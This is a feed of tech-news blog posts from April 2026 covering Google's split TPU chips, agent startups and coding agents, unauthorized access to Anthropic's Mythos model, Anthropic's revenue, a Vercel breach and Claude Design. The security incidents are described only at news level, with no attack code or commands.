Security Forem: Om Shree

Google Just Split Its TPU Into Two Chips. Here's What That Actually Signals About the Agentic Era.

Om Shree — Thu, 23 Apr 2026 03:47:11 +0000

Training and inference have always had different physics. Google just decided to stop pretending one chip could handle both.

At Google Cloud Next '26 on April 22, Google announced the eighth generation of its Tensor Processing Units — but for the first time in TPU history, that generation isn't a single chip. It's two: the TPU 8t for training, and the TPU 8i for inference and agentic workloads. That architectural split is the most meaningful signal in this announcement, and most coverage has buried it.

The Problem It's Solving

Standard RAG retrieves. Agents reason, plan, execute, and loop back. That distinction matters enormously at the infrastructure level.

Chat-based AI inference has a relatively forgiving latency budget. A user submits a prompt, waits a second or two, reads the response. Agentic workflows don't work that way. A primary agent decomposes a goal into subtasks, dispatches specialized agents, collects results, evaluates them, and decides what to do next — all in real time, potentially across thousands of concurrent sessions. The per-step latency compounds. If your inference chip is optimized for throughput over latency (which it was, because that's what training needs), you end up with agent loops that are sluggish, expensive, and hard to scale.

Previous TPU generations, including last year's Ironwood, were pitched as unified flagship chips. Google's internal experience running Gemini, its consumer AI products, and increasingly complex agent workloads apparently showed that a single architecture forces uncomfortable trade-offs. So they split the roadmap.

How the TPU 8t and TPU 8i Actually Work

The TPU 8t is the training powerhouse. It packs 9,600 chips in a single superpod to provide 121 exaflops of compute and two petabytes of shared memory connected through high-speed inter-chip interconnects. That's roughly 3x higher compute performance than the previous generation, with doubled ICI bandwidth to ensure that massive models hit near-linear scaling. At the cluster level, Google can now connect more than one million TPUs across multiple data center sites into a training cluster — essentially transforming globally distributed infrastructure into one seamless supercomputer.

The TPU 8i is the more architecturally interesting chip. With 3x more on-chip SRAM over the previous generation, TPU 8i can host a larger KV Cache entirely on silicon, significantly reducing the idle time of the cores during long-context decoding. The key innovation is a component called the Collectives Acceleration Engine (CAE) — a dedicated unit that aggregates results across cores with near-zero latency, specifically accelerating the reduction and synchronization steps required during autoregressive decoding and chain-of-thought processing. The result: on-chip latency of collectives drops by 5x.

Google also redesigned the inter-chip network topology specifically for 8i. The previous 3D torus topology prioritized bandwidth. For 8i, Google changed how chips connect together using fully connected boards aggregated into groups — a high-radix design called Boardfly that connects up to 1,152 chips together, reducing the network diameter and the number of hops a data packet must take to cross the system, achieving up to a 50% improvement in latency for communication-intensive workloads.

In raw spec terms, the 8i delivers 9.8x the FP8 EFlops per pod, 6.8x the HBM capacity per pod, and a pod size that grows 4.5x from 256 to 1,152 chips compared to the prior generation.

The economic headline: TPU 8i delivers 80% better performance per dollar for inference than the prior generation.

What Teams Are Actually Using This For

The split architecture is most directly useful for three categories of workload.

Frontier model training at labs and large enterprises. TPU 8t was designed in partnership with Google DeepMind and is built to efficiently train world models like DeepMind's Genie 3, enabling millions of agents to practice and refine their reasoning in diverse simulated environments. If you're training large proprietary models, the 8t's near-linear scaling at million-chip clusters changes the economics of when you can afford to retrain.

High-concurrency agentic inference is where the 8i shines. Multi-agent pipelines, MoE model serving, chain-of-thought reasoning loops — all of these hammer the all-to-all communication patterns that the Boardfly topology specifically addresses. The implication is lower latency per agent step at scale, which compounds significantly when you're running thousands of parallel agent sessions.

Reinforcement learning post-training sits between the two. Google's new Axion-powered N4A CPU instances handle the complex logic, tool-calls, and feedback loops surrounding the core AI model — offering up to 30% better price-performance than comparable agent workloads on other hyperscalers. The intended stack is TPU 8t for pre-training, TPU 8i for RL and inference, and Axion for orchestration logic.

Google is also wrapping all of this in upgraded networking. The Virgo Network's collapsed fabric architecture offers 4x the bandwidth of previous generations and can connect 134,000 TPUs into a single fabric in a single data center. Storage got overhauled too: Google Cloud Managed Lustre now delivers 10 TB/s of bandwidth — a 10x improvement over last year — with sub-millisecond latency via TPUDirect and RDMA, allowing data to bypass the host and move directly to the accelerators.

Why This Is a Bigger Deal Than It Looks

The obvious read on this announcement is "Google vs. Nvidia." That framing is mostly wrong, and Google itself isn't pretending otherwise. Google promises its cloud will have Nvidia's latest chip, Vera Rubin, available later this year, and the two companies are co-engineering the open-source Falcon networking protocol via the Open Compute Project. This is not a replacement strategy — it's a portfolio strategy.

The more important signal is what the architectural split says about where the AI workload is going. Seven generations of TPUs were built on the assumption that training and inference are different phases of the same pipeline — you train, then you serve. The 8t/8i split encodes a different belief: that agentic inference is so architecturally distinct from training that they require fundamentally different silicon. That's a bet on the permanence of agentic workflows, not just a current optimization.

For enterprise buyers, the TPU v8 reframes the 2026–2027 cloud evaluation in concrete ways: teams training large proprietary models should look at 8t availability windows and Virgo networking access. Teams serving agents or reasoning workloads should evaluate 8i on Vertex AI and whether HBM-per-pod sizing fits their context windows.

There's also a vertical integration argument here that's easy to underestimate. Google co-designs its chips with DeepMind, runs them on its own networking fabric, manages its own storage layer, and orchestrates everything through GKE. Native PyTorch support for TPU — TorchTPU — is now in preview with select customers, allowing models to run on TPUs as-is with full support for native PyTorch Eager Mode. That removes one of the biggest friction points developers have historically had with TPUs: you no longer need to rewrite your training code to access Google's silicon. Combined with vLLM support on TPU, the migration path from an Nvidia-based setup is shorter than it's ever been.

Availability and Access

TPU 8t and TPU 8i will be available to Cloud customers later in 2026. You can request more information now to prepare for their general availability. The chips are integrated into Google's AI Hypercomputer stack, supporting JAX, PyTorch, vLLM, and XLA. Deployment options range from Vertex AI managed services to GKE for teams that want infrastructure-level control.

The honest caveat: these are self-reported benchmarks against Google's own prior generation. Independent third-party numbers from cloud customers and evaluators will emerge over the next two quarters, and those will be the numbers that actually matter for procurement decisions.

The split TPU roadmap isn't just a chip announcement — it's Google encoding its architectural thesis about what AI infrastructure looks like in an agentic world directly into silicon. Every other hyperscaler is going to have to answer the same question: do you build one chip to do everything, or do you specialize?

Follow for more coverage on MCP, agentic AI, and AI infrastructure.

NeoCognition Just Raised $40M to Fix the One Thing Every AI Agent Gets Wrong

Om Shree — Thu, 23 Apr 2026 03:34:27 +0000

Every AI agent demo looks impressive until you actually depend on one. That 50% task completion rate you've quietly accepted as "normal"? NeoCognition just called it out directly, and raised $40 million to do something about it.

The Problem It's Solving

The foundational critique that NeoCognition is building on is blunt: current agents — whether from Claude Code, OpenClaw, or Perplexity's computer tools — successfully complete tasks as intended only about 50% of the time. That is not a UX problem or a prompt engineering problem. It's a structural one. Today's agents are stateless generalists. They bring no accumulated knowledge of your environment, your workflows, or your domain's specific constraints to each task. Every time you invoke one, it's starting from scratch.

The standard industry response to this has been fine-tuning — custom-engineering an agent for a specific vertical and hoping it holds. That works until the domain shifts, the tooling changes, or you need to deploy the same agent somewhere new. Then you're back to zero.

How NeoCognition Actually Works

NeoCognition was started by Yu Su, Xiang Deng, and Yu Gu, who all worked together in Su's AI agent lab at Ohio State University. Su's team began developing LLM-based agents before the ChatGPT moment, and their research — including Mind2Web and MMMU — is now used by OpenAI, Anthropic, and Google. This is not a product team that pivoted into agents. It's the research behind the agents you're already using, now building something opinionated about what those agents got wrong.

The core thesis is drawn from how humans actually acquire expertise. NeoCognition's agents continuously learn the structure, workflows, and constraints of the environments they operate in, and specialize into domain experts by learning a world model of work. The phrase "world model" is doing significant work here. Rather than applying general reasoning to every task, these agents are designed to build an internal map of a specific micro-environment — its rules, its dependencies, its edge cases — and continuously refine that map through experience.

The Palo Alto startup argues that its agents learn on the job as specialists rather than relying on fixed general training, which is the architectural distinction that matters. Fixed training is a snapshot. A world model grows.

What Enterprises Are Actually Using It For

NeoCognition's primary target is the enterprise market, and specifically the SaaS layer. NeoCognition intends to sell its agent systems primarily to enterprises, including established SaaS companies, which can use them to build agent workers or to enhance existing product offerings. The framing here is interesting: they're not just selling agents to enterprises, they're selling the infrastructure for SaaS companies to make their own products agentic.

The Vista Equity Partners participation is strategic, not just financial. As one of the largest private equity firms in the software space, Vista can provide NeoCognition with direct access to a vast portfolio of companies looking to modernize their products with AI. That's a go-to-market lever, not just a check. You don't close Vista for the cap table optics — you close them because they own the distribution you need.

The deeper implication for enterprises is the safety argument. Deeper understanding of their environments enables NeoCognition's agents to be more responsible and safer actors in high-stake settings. An agent that understands why a workflow exists — not just what the workflow is — is less likely to take a technically correct action that's contextually wrong. That's the difference between a tool and a trusted system.

Why This Is a Bigger Deal Than It Looks

The investor list deserves more attention than most coverage is giving it. Angel investors and founding advisors include Lip-Bu Tan, CEO of Intel, Ion Stoica, co-founder and executive chairman of Databricks, and leading AI researchers like Dawn Song, Ruslan Salakhutdinov, and Luke Zettlemoyer. That last trio — Song, Salakhutdinov, Zettlemoyer — are foundational researchers in modern deep learning and NLP. When researchers of that caliber put their names on a company, they're endorsing the technical thesis, not just the team.

The timing reflects a broader pattern in AI investment in 2026: capital is increasingly flowing not towards frontier model development — dominated by a small number of well-capitalized labs — but towards the infrastructure and agent layer above it. The model wars are effectively over for now. The next real competition is in what those models can reliably do, and that's an infrastructure and learning problem, not a parameter-count problem.

What NeoCognition is proposing — agents that build structured world models of their operating environments — is also the missing architectural primitive for MCP-based agent pipelines. Right now, most agentic systems using MCP are still stateless: each tool call happens in context, but the agent isn't learning the tool ecosystem it operates in. An agent layer that builds persistent, structured knowledge of its environment and the tools available to it would meaningfully change what's achievable in production agentic workflows.

Availability and Access

NeoCognition has just emerged from stealth, so there's no public product available yet. The company currently has about 15 employees, the majority of whom hold PhDs. This is explicitly still a research-to-product transition — the $40M is funding that transition. Enterprise access will likely come through direct partnership channels, given the Vista relationship and the SaaS-first go-to-market. Developers wanting to follow the research can track Su's prior work through his Ohio State lab page.

The 50% reliability ceiling on current agents isn't a model problem — it's a memory and specialization problem. NeoCognition is making a structural bet that the next unlock in agent reliability isn't more parameters; it's agents that actually learn where they're deployed. If they're right, the companies building on today's stateless agent architectures are building on borrowed time.

Follow for more coverage on MCP, agentic AI, and AI infrastructure.

Google's Project Jitro Just Redefined What a Coding Agent Is. Here's What It Actually Changes.

Om Shree — Wed, 22 Apr 2026 03:35:56 +0000

Project Jules used to tell your AI what to do. Jitro tells it what you want. That gap — between task execution and outcome ownership — is the entire bet Google is making with its next-generation coding agent.

The Problem With Every Coding Agent Right Now

Every major AI coding tool today, GitHub Copilot, Cursor, Windsurf, OpenAI's Codex — operates on the same underlying model: you define the work, the agent does it. You write the prompt, you review the output, you write the next prompt. The developer is still the scheduler, the project manager, and the QA team. The AI is a very fast, very capable executor.

That's genuinely useful. But it hits a ceiling. When your goal is "reduce memory leaks in the backend by 20%" or "get our accessibility score to 100%," you don't want to translate that into ten sequential prompts across a week. You want to hand it off. No current tool actually lets you do that.

How Project Jitro Actually Works

Google is internally developing Project Jitro as an autonomous AI system that moves beyond prompt-based coding to independently execute high-level development goals. It's built on Jules, Google's existing asynchronous coding agent — but the architecture is meaningfully different.

Rather than asking developers to manually instruct an agent on what to build or fix, Jules V2 appears designed around high-level goal-setting — KPI-driven development, where the agent autonomously identifies what needs to change in a codebase to move a metric in the right direction.

The workspace model is the critical piece. A dedicated workspace for the agent suggests Google envisions Jitro as a persistent collaborator rather than a one-shot tool. Early signals point to a workspace where developers can list goals, track insights, and configure tool integrations — a layer of continuity that current coding agents don't offer.

From leaked tooling definitions, the Jitro workspace API exposes operations like: list goals, create a goal after helping articulate it clearly, list insights, get update history for an insight, and list configured tool integrations including MCP remote servers and API connections. That last item is significant — Jitro integrates through Model Context Protocol (MCP) remote servers and various API connections to ensure it has the context it needs.

Transparency is baked in by design. When you set a goal in the Jitro workspace, the AI doesn't just operate silently — it surfaces its reasoning process, explaining why it chose a specific library or restructured a database table. You stay in control by approving the general direction, while the AI handles the execution.

What Engineering Teams Are Actually Going to Use This For

The use cases where this model genuinely wins are the ones that are currently painful in proportion to their importance: reducing error rates becomes the objective instead of debugging individual functions; improving test coverage becomes the target instead of writing test cases manually across multiple files; increasing conversions becomes the priority instead of adjusting isolated page elements without strategy alignment.

The primary beneficiaries would be engineering teams managing large codebases where incremental improvements compound — performance optimization, test coverage, accessibility compliance.

Jules V1 already demonstrated that the asynchronous model works. During the beta, thousands of developers tackled tens of thousands of tasks, resulting in over 140,000 code improvements shared publicly. Jules is now out of beta and available across free and paid tiers, integrated into Google AI Pro and Ultra subscriptions. Jitro inherits that async foundation and extends it to goals that span sessions, not just tasks.

Why This Is a Bigger Deal Than It Looks

The shift from prompt-driven to goal-driven AI isn't a UX improvement — it's a change in the unit of work. Right now, developer productivity is measured by how good your prompts are. Jitro changes that to how clearly you can define outcomes.

Routine tasks like debugging, writing boilerplate code, or running tests may increasingly be handled by AI systems. As a result, developers may shift toward higher-level responsibilities — guiding AI systems, reviewing outputs, and aligning technical work with business goals.

This marks a departure from the task-level paradigm seen across competitors like GitHub Copilot, Cursor, and even OpenAI's Codex agent, all of which still rely on developers defining specific work items. If Jitro ships as described, it resets what the category baseline looks like. Every competitor will be asked why their tool still needs a prompt for every action.

The MCP integration angle is also worth watching closely. A goal-oriented coding agent that natively connects to MCP remote servers can reach across your entire toolchain — CI/CD, monitoring, issue trackers — rather than reasoning only over local files. That's a different class of tool.

The honest caveat: the risk is that autonomous goal-pursuing agents introduce unpredictable changes, and trust will be the key barrier to adoption. None of the UI is visible yet, so the full scope remains unclear. There's a real question about what "approve the direction" actually looks like in practice when the agent is making dozens of decisions across a large codebase.

Availability and Access

Project Jitro is still pre-launch. The upcoming experience is expected to launch under a waitlist, with Google I/O 2026 on May 19 as the likely announcement moment alongside broader Gemini ecosystem updates. The Jules team has published a waitlist page with messaging that reads: "Manually prompting your agents is so… 2025."

Current Jules users on Google AI Pro and Ultra are the most likely early access recipients. No public timeline beyond "2026" has been confirmed.

The line between "AI that helps you code" and "AI that owns a development objective" is the line Jitro is trying to cross. Whether it lands or not at I/O, the framing alone forces every other coding tool to answer the same question: how long until your users stop writing prompts?

Follow for more coverage on MCP, agentic AI, and AI infrastructure.

Anthropic's Most Dangerous Model Just Got Accessed by People Who Weren't Supposed to Have It

Om Shree — Wed, 22 Apr 2026 01:28:17 +0000

Anthropic built a model so dangerous they refused to release it publicly. Then a Discord group got in anyway.

The Model They Wouldn't Ship

Claude Mythos Preview is Anthropic's most capable model to date for coding and agentic tasks. Anthropic But it was never meant to reach the public. During testing, Mythos improved to the point where it mostly saturated existing cybersecurity benchmarks, prompting Anthropic to shift focus to novel real-world security tasks — specifically zero-day vulnerabilities, bugs that were not previously known to exist. Anthropic

What they found was stark. Mythos Preview had already identified thousands of zero-day vulnerabilities across critical infrastructure — many of them critical — in every major operating system and every major web browser. Anthropic In one documented case, Mythos fully autonomously identified and exploited a 17-year-old remote code execution vulnerability in FreeBSD that allows anyone to gain root on a machine running NFS. No human was involved in either the discovery or exploitation of this vulnerability after the initial request to find the bug. Anthropic

This is why the model never went public.

Project Glasswing: The Controlled Release

Announced on April 7, Mythos was deployed as part of Anthropic's "Project Glasswing," a controlled initiative under which select organizations are permitted to use the unreleased Claude Mythos Preview model for defensive cybersecurity. Yahoo!

Launch partners included Amazon Web Services, Anthropic, Apple, Broadcom, Cisco, CrowdStrike, Google, JPMorganChase, the Linux Foundation, Microsoft, NVIDIA, and Palo Alto Networks. Access was also extended to over 40 additional organizations that build or maintain critical software infrastructure. Anthropic The logic was clear: get defenders ahead of the curve before the capabilities proliferate to actors who won't use them carefully.

Claude Mythos Preview is available to Project Glasswing participants at $25/$125 per million input/output tokens, accessible via the Claude API, Amazon Bedrock, Google Cloud's Vertex AI, and Microsoft Foundry. Anthropic committed $100M in model usage credits to cover Project Glasswing throughout the research preview. Anthropic

The perimeter was tight by design. The news today is that it didn't hold.

How the Discord Group Got In

A "private online forum," the members of which have not been publicly identified, managed to gain access to the tool through a third-party vendor. The unauthorized group tried a number of different strategies to gain access to the model, including using "access" enjoyed by a person currently employed at a third-party contractor that works for Anthropic. TechCrunch

Members of the group are part of a Discord channel that seeks out information about unreleased AI models. The group has been using Mythos regularly since gaining access to it, and provided evidence to Bloomberg in the form of screenshots and a live demonstration of the software. TechCrunch

The method they used to find the endpoint is particularly revealing. The group, which gained access on the very same day Mythos was publicly announced, "made an educated guess about the model's online location based on knowledge about the format Anthropic has used for other models." TechCrunch This wasn't a sophisticated breach — it was pattern recognition applied to a known naming convention. The group reportedly described themselves as being interested in exploring new models, not causing harm.

Anthropic said it is investigating the claims and, so far, has seen no sign that its own systems were affected — the allegation points to possible misuse of access outside Anthropic's core network, not a confirmed breach of the company's internal defenses. Prism News

Why This Is a Bigger Deal Than It Looks

The immediate reassurance — no core systems compromised, the group wasn't malicious — is accurate but beside the point. The problem isn't what this specific group did. It's what this incident reveals about the entire premise of Project Glasswing.

Anthropic's controlled release strategy rests on the assumption that access can be meaningfully gated through vendor relationships. A small group of unauthorized users reportedly accessed Mythos on the same day Anthropic announced limited testing Prism News — meaning the access controls failed within hours of the first public announcement, before most Glasswing partners had even begun their work. If the group could guess the model's endpoint from Anthropic's known URL patterns, so can threat actors with more resources and worse intentions.

There's also a pattern here worth naming. This is the third significant information control failure at Anthropic in recent weeks. The Claude Code source leak in March exposed 512,000 lines of unobfuscated TypeScript via a missing .npmignore entry. Before that, a draft blog post describing Mythos as "by far the most powerful AI model" ever built at Anthropic was left in a publicly accessible data store. That March 26 leak of draft materials — which Anthropic said resulted from human error in its content-management configuration — was actually Mythos's first public exposure. Prism News

Then there's the government subplot. The National Security Agency is using Mythos Preview despite top officials at the Department of Defense — which oversees the NSA — insisting Anthropic is a "supply chain risk." The department moved in February to cut off Anthropic and force its vendors to follow suit. The military is now broadening its use of Anthropic's tools while simultaneously arguing in court that using those tools threatens U.S. national security. Axios Meanwhile, CISA — the agency whose entire mandate is critical infrastructure protection — reportedly does not have access to the model. Axios

The entity designed to defend critical systems can't get in. A Discord group can.

What Anthropic Actually Said

"We're investigating a report claiming unauthorized access to Claude Mythos Preview through one of our third-party vendor environments," an Anthropic spokesperson said. The company found no evidence that the supposedly unauthorized activity impacted Anthropic's systems at all. TechCrunch

That's a factually careful statement. It's also a familiar shape: acknowledge the narrow, deny the broader implication. Anthropic has been here before.

The Vendor Problem Nobody Wants to Solve

The deeper structural issue is that enterprise AI deployments at frontier capability levels require trust chains that extend across dozens of organizations. Anthropic's 40-organization Glasswing rollout means 40 distinct security postures, 40 sets of contractors, and 40 potential lateral entry points for anyone who knows what they're looking for.

Anthropic said it does not plan to make Mythos Preview generally available, but its eventual goal is to enable users to safely deploy Mythos-class models at scale — for cybersecurity purposes, but also for the myriad other benefits that such highly capable models will bring. Simon Willison That goal is legitimate. But reaching it requires solving vendor access governance at a level the industry hasn't had to reckon with before. This incident is an early indication of what the stakes look like when the effort falls short.

A model capable of finding zero-days in every major operating system and browser has now been accessed by people outside the intended perimeter. The question isn't whether the Discord group caused harm. It's whether the perimeter can hold when the people on the other side are actually trying.

The line between "interested in playing around" and "interested in breaking things" isn't enforced by intent. It's enforced by access controls. Anthropic's have now failed twice in the same month.

Follow for more coverage on MCP, agentic AI, and AI infrastructure.

Anthropic Just Passed OpenAI in Revenue. Here's What Actually Built That Lead.

Om Shree — Mon, 20 Apr 2026 06:46:06 +0000

A year ago, the consensus was that OpenAI had an insurmountable lead. The brand. The user base. ChatGPT with hundreds of millions of users. The head start. In April 2026, Anthropic crossed $30 billion in annualized revenue and left OpenAI's $25 billion behind — the first time any rival has led this race since ChatGPT launched in November 2022.

The Number That Shocked Even the Analysts

Anthropic's annualized revenue run-rate hit $30 billion in April 2026, officially overtaking OpenAI's $25 billion — the first time any rival has surpassed OpenAI since ChatGPT launched in 2022. Vucense

Epoch AI had modeled it. Analysts debated the timing. It was supposed to happen even under the most optimistic assessments in August 2026. It happened in April. SaaStr

The trajectory itself is the story. Anthropic went from $87 million run-rate in January 2024, to $1 billion by December 2024, to $9 billion by end of 2025, to $14 billion in February 2026, to $19 billion in March, to $30 billion in April. That last sequence — $14B to $30B in roughly 8 weeks — is hard to make sense of in traditional software terms. SaaStr

For context: Salesforce took about 20 years to reach $30 billion in annual revenue. Anthropic did it in under 3 years from a standing start. SaaStr

The Enterprise Bet That Everyone Underestimated

OpenAI's revenue composition is more consumer-heavy, with ChatGPT Plus and Pro subscriptions making up a large share. Anthropic's composition runs roughly 80% enterprise — higher retention, lower churn, and contracts that expand over time rather than cancelling when novelty fades. Robo Rhythms

The customer numbers make this concrete. Enterprise customers spending over $1 million annually doubled to 1,000+ in under two months. Eight of the Fortune 10 are Anthropic customers. Vucense

In the enterprise LLM API market, Anthropic accounts for 32% compared to OpenAI's 25%. Seven out of every ten new enterprise customers choose Anthropic. Tradingkey

Enterprise buyers treat a large funding round as a signal of platform stability. Companies that had been hesitant to commit multi-year API contracts moved forward after Anthropic's February 2026 Series G because Anthropic looked like it was in the race to stay. The doubling of $1M+ clients in under two months right after the Series G confirms that signal-driven buying happened at scale. Robo Rhythms

Claude Code: The Single Product That Changed Everything

None of this happens without Claude Code. Launched in May 2025, Claude Code reached an annualized revenue of $1 billion by November, and surpassed $2.5 billion by February 2026 — a product growing from zero to $2.5 billion in nine months. Reviewing SaaS industry history, no faster case has been found. KuCoin

Business subscriptions to Claude Code have quadrupled since the start of 2026, and enterprise use has grown to represent over half of all Claude Code revenue. Anthropic

Claude Code holds a 54% market share in the AI programming tool segment — far exceeding GitHub Copilot and Cursor. Tradingkey

The reason enterprises pay for it is structural, not incremental. GitHub Copilot helps you complete the next line as you write code — you're still the one doing the work. Claude Code doesn't just autocomplete; it handles entire workflows. KuCoin That's the difference between a feature and a budget line replacement.

And Claude Code is available on every major surface. Claude is the only frontier AI model available on all three of the world's largest cloud platforms: AWS Bedrock, Google Cloud Vertex AI, and Microsoft Azure Foundry. The-ai-corner

The Training Cost Gap Nobody Is Talking About Enough

Revenue is the headline. The cost structure is the real story.

OpenAI is projected to spend $125 billion per year on training by 2030. Anthropic's projection for the same period: around $30 billion. Same race. 4x difference in cost. The-ai-corner

OpenAI is burning approximately $17 billion in cash this year. Internal documents project a $14 billion loss for 2026. The company does not project positive free cash flow until 2029. Anthropic projects positive free cash flow by 2027 — three years ahead of its main competitor, while generating more revenue. SaaStr

A new agreement with Google and Broadcom will deliver approximately 3.5 gigawatts of next-generation TPU capacity starting in 2027. Rather than relying solely on Nvidia GPUs, Anthropic is diversifying across Google TPUs, AWS Trainium chips, and Nvidia hardware — matching workloads to the chips best suited for them. Medium

Anthropic is investing its revenue advantage into infrastructure before it needs it. That's a different kind of discipline than raising $120 billion and spending it on training runs.

Why This Is a Bigger Deal Than a Revenue Chart

The revenue story is inseparable from Anthropic's deliberate choice to prioritise enterprise over consumers. The $30B ARR is earned by being useful to businesses, not by harvesting user attention. Vucense

The Pentagon labelled Anthropic a supply chain risk for refusing to arm autonomous weapons with Claude. Revenue accelerated anyway — from $19B to $30B ARR in the weeks after that clash became public. The enterprise customer base that drives Anthropic's revenue appears to have either ignored or positively responded to Anthropic's refusal to compromise. Vucense

One caveat worth stating plainly: OpenAI has argued that Anthropic is using a gross revenue accounting treatment with its deals with Amazon and Google that inflates top-line figures. The real net figure, by OpenAI's accounting, would be lower. Gardenzhome That dispute isn't settled. But even accounting for it, the trajectory is real, the enterprise customer count is real, and the Claude Code numbers are real.

Availability and What It Means for Developers

Anthropic operates its models on a diversified range of AI hardware — AWS Trainium, Google TPUs, and NVIDIA GPUs — which means it can match workloads to the chips best suited for them. Anthropic

The IPO question is now live. Anthropic is targeting October 2026, aiming to raise $60B+ at a $380B valuation. No S-1 has been filed. The timeline is subject to market conditions and the SEC's review of accounting methodology questions. Vucense

Anthropic's $30 billion run rate exceeds the trailing twelve-month revenues of all but approximately 130 S&P 500 companies. A company that was essentially pre-revenue in early 2024 now out-earns most of the Fortune 500. Medium

The company that left OpenAI to build AI more carefully just built a bigger business doing it. That's not an accident — it's a thesis proving out in real time. The question now isn't whether Anthropic belongs in the same conversation as OpenAI. It's whether the enterprise-first, developer-first model it validated is the one the rest of the industry will be chasing for the next decade.

Follow for more coverage on MCP, agentic AI, and AI infrastructure.

Vercel Just Confirmed a Security Breach. Here's What Actually Got Exposed — and Why It's Bigger Than One Company.

Om Shree — Mon, 20 Apr 2026 00:42:45 +0000

Vercel is the deployment layer for a meaningful percentage of the modern web. That's exactly what makes yesterday's confirmed breach something every developer should understand, not just Vercel customers.

The Problem It's Solving for Attackers

Vercel is a cloud platform that provides hosting and deployment infrastructure for developers, with a strong focus on JavaScript frameworks. The company is known for developing Next.js, a widely used React framework, and for offering services such as serverless functions, edge computing, and CI/CD pipelines that enable developers to build, preview, and deploy applications. Bleeping Computer In short: Vercel sits at the center of how thousands of startups and enterprises ship code. That's not an incidental detail. That's exactly why it became a target.

On April 19, 2026, Vercel published a security bulletin confirming that the company detected unauthorized access and has since engaged external incident response experts to investigate and contain the breach. Law enforcement has also been notified, and the company says it is continuing its forensic analysis while maintaining service availability. CyberInsider

How the Attack Actually Happened

This wasn't a brute-force attack on Vercel's perimeter. The entry point was far more insidious — and a warning for every engineering team running a modern SaaS stack.

Vercel's investigation revealed that the incident originated from a small, third-party AI tool whose Google Workspace OAuth app was the subject of a broader compromise, potentially affecting its hundreds of users across many organizations. Vercel Vercel has not publicly named the specific tool. The Verge reported that Vercel has not disclosed which specific third-party AI vendor served as the attack vector. Startup Fortune

The architecture of the attack matters here. Attackers do not always need to smash through a front door when they can slip in through a trusted integration. Some reporting said the intrusion may have started through a compromised third-party AI tool linked to Google Workspace, rather than a direct attack on Vercel itself. Prism News

Once inside, the blast radius expanded fast. Developer Theo Browne shared additional details, noting that Vercel's Linear and GitHub integrations bore the brunt of the attack. Yahoo!

What Teams Are Actually Dealing With Right Now

Here's what got exposed, based on what's been confirmed and what threat actors are claiming — those are two different things worth keeping separate.

A person claiming to be a member of ShinyHunters posted a file containing 580 employee records, including names, Vercel email addresses, account status, and activity timestamps. The same actor claimed access to internal deployments, API keys, NPM tokens, GitHub tokens, source code, and database data. Vercel has not independently verified those assertions. Prism News

It should be noted that while the hacker claims to be part of the ShinyHunters group, threat actors linked to recent attacks attributed to the ShinyHunters extortion gang have denied to BleepingComputer that they are involved in this incident. Bleeping Computer

The ransom demand adds another layer. In messages shared on Telegram, the threat actor claimed they were in contact with Vercel regarding the incident and that they discussed an alleged ransom demand of $2 million. Bleeping Computer The group is offering what they describe as access keys, source code, and database contents from Vercel, asking $2 million, with an initial payment of $500,000 in Bitcoin. Techweez

On the customer side, the immediate concern is environment variables. The main concern for Vercel customers is environment variables — configuration values your app uses at runtime, which includes things like API keys, database credentials, and signing tokens. The problem is anything that wasn't marked sensitive. Those values should be treated as compromised and rotated immediately. Techweez

However, environment variables marked as "sensitive" within the platform remained protected. Yahoo!

Why This Is a Bigger Deal Than One Breach

The reason this incident matters beyond Vercel's own customer list comes down to two words: supply chain.

What makes the claim worth paying attention to is the scale ShinyHunters is alluding to. Vercel hosts Next.js, which reportedly sees around 6 million weekly downloads. The group suggests that access to Vercel's internals could enable a supply chain attack — essentially, tampering with packages that millions of developers download and run in their own software. Techweez

If even part of that access turns out to be real, the fallout could extend well beyond employee privacy. Secrets and tokens can be reused to reach build systems, package registries, and source repositories, which is why researchers warned that the incident could become a supply-chain problem for startups, enterprises, and ordinary users relying on apps hosted or deployed through Vercel, including Next.js projects. Prism News

For crypto and Web3 developers specifically, the situation is acute. Many crypto and Web3 frontends deploy on Vercel, from wallet connectors to decentralized application interfaces. Projects storing API keys, private RPC endpoints, or wallet-related secrets in non-sensitive environment variables face potential exposure risk. The breach does not threaten blockchains or smart contracts directly, as those operate independently of frontend hosting. However, compromised deployment pipelines could theoretically allow build tampering for affected accounts. Yahoo!

And then there's the IPO angle. This breach lands at a brutal moment for Vercel's business trajectory. Reports from just days earlier highlighted a planned IPO following a reported 240% revenue surge, driven largely by enterprise adoption of AI-powered deployment workflows. Security incidents are notoriously damaging during a quiet period, when companies are legally restricted in how they can communicate with investors and the public. Startup Fortune

Availability and Access: What You Should Do Right Now

Vercel's guidance to customers covers several concrete steps: review account and environment activity logs for suspicious behavior, rotate environment variables and API keys, and leverage built-in features for managing sensitive variables. Substack

Vercel has also rolled out updates to its dashboard, including an overview page of environment variables and an improved interface for managing sensitive environment variables. Bleeping Computer

Vercel is publishing an IOC (indicator of compromise) to support the wider community in investigating and vetting potential malicious activity. They recommend that Google Workspace administrators and Google account owners check for usage of the compromised app immediately. Vercel

If you use Vercel: rotate every secret that wasn't explicitly marked sensitive. If your project built or deployed during the breach window, audit it regardless of whether you're in the "limited subset" Vercel is directly contacting. The investigation is still ongoing — the scope could expand.

The deeper lesson here isn't about Vercel specifically. It's about what happens when a small, trusted AI tool with OAuth access to your workspace becomes the softest point in your entire deployment chain — and you had no way to know it was compromised until someone started selling your tokens on BreachForums.

Credential hygiene and OAuth scope reviews aren't optional maintenance tasks anymore. They're the front line.

Follow for more coverage on MCP, agentic AI, and AI infrastructure.

Anthropic Just Launched Claude Design. Here's What It Actually Changes for Non-Designers.

Om Shree — Sun, 19 Apr 2026 05:31:03 +0000

Figma has been the unchallenged design layer for product teams for years. On April 17, 2026, Anthropic quietly placed a bet that the next design tool doesn't look like Figma at all — it looks like a conversation.

The Problem It's Solving

Design has always had a bottleneck that nobody talks about openly: the distance between the person with the idea and the person who can execute it. A founder has a vision for a landing page. A PM sketches a feature flow on a whiteboard. A marketer needs a campaign asset by end of day. In every case, they're either waiting on a designer, wrestling with a tool that wasn't built for them, or shipping something that looks like it was made in a hurry — because it was.

Even experienced designers face a version of this. Exploration is rationed. There's rarely time to prototype ten directions when you have two days before a stakeholder review. So teams commit early, iterate less, and ship with more uncertainty than they'd like.

Claude Design is Anthropic's answer to both problems simultaneously.

How It Actually Works

The product is powered by Claude Opus 4.7, Anthropic's latest and most capable vision model. The core loop is simple: describe what you need, Claude builds a first version, and you refine it through conversation. But the details of how that refinement works are what separate this from a glorified prompt-to-image tool.

You can comment inline on specific elements — not the whole design, a specific button or heading. You can edit text directly in the canvas. And in a genuinely interesting touch, Claude can generate custom adjustment sliders for spacing, color, and layout that let you tune parameters live without writing another prompt.

